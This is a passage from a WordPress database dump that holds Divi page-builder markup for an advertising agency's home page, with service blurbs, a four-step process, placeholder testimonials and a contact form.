text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 17:02:32','2020-08-07 17:02:32','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(514,1,'2020-08-07 17:11:02','2020-08-07 17:11:02','Digital advertising agency','digital-marketing-agency','','inherit','open','closed','','artboard-5-2','','','2020-08-07 17:12:33','2020-08-07 17:12:33','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (515,1,'2020-08-07 17:12:41','2020-08-07 17:12:41','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" 